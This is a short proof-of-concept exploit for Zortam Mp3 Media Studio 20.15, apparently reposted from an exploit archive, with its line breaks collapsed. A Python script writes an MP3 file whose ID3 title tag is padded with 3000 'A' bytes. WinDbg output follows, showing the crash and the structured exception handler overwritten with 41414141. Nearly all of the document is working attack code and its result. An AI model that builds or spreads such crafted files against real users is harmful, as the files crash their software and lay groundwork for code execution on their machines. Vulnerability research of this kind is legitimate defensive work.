#-*- coding: utf-8 -*-## Exploit Title : Zortam Mp3 Media Studio 20.15 - SEH overflow DOS# Date: 2016-03-12# Author: INSECT.B# Facebook : https://www.facebook.com/B.INSECT00# GitHub : binsect00# Blog : http://binsect00.tistory.com# Vendor Homepage : http://www.zortam.com# Software Link: http://www.zortam.com/download.html# Version: 20.15# Tested on: Windows7 Professional SP1 En x86 # CVE : N/A## Detail..# 1. Zortam Mp3 Media Studio is program that change tags sound file# 2. If tag length over certain length, program is occured crash. # 3. Make mp3 file. title tag length is 3000.# 4. program open. and serching Directoryid3Id = '\x49\x44\x33' #ID3id3Version = '\x03\x00'id3Flag = '\x00'id3Size = '\x00\x00\x2F\x2D'id3 = id3Id + id3Version + id3Flag + id3SizeframeId = '\x54\x49\x54\x32' #TIT2frameSize = '\x00\x00\x0B\xB9' #Frame SizeframeFlag = '\x00\x00'textEncoding = '\x00'textInfo = 'A'*3000frame = frameId + frameSize + frameFlag + textEncoding + textInfopadding = '\x00'*1100payload = id3 + frame + paddingwith open('Zortam Mp3 Media Studio 20.15 DOS Vulnerabilities.mp3','wb') as f: f.write(payload)'''STATUS_STACK_BUFFER_OVERRUN encountered(aa4.c08): Break instruction exception - code 80000003 (first chance)eax=00000000 ebx=743b74ec ecx=7619e28c edx=0012e4a9 esi=00000000 edi=756d6640eip=7619e109 esp=0012e6f0 ebp=0012e76c iopl=0 nv up ei pl zr na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200246*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\system32\kernel32.dll - kernel32!FormatMessageA+0x14031:7619e109 cc int 30:000> !exchain0012e75c: kernel32!RegSaveKeyExA+3e9 (761ca022)0012f2b8: 41414141Invalid exception stack at 41414141'''
Komentarų nėra:
Rašyti komentarą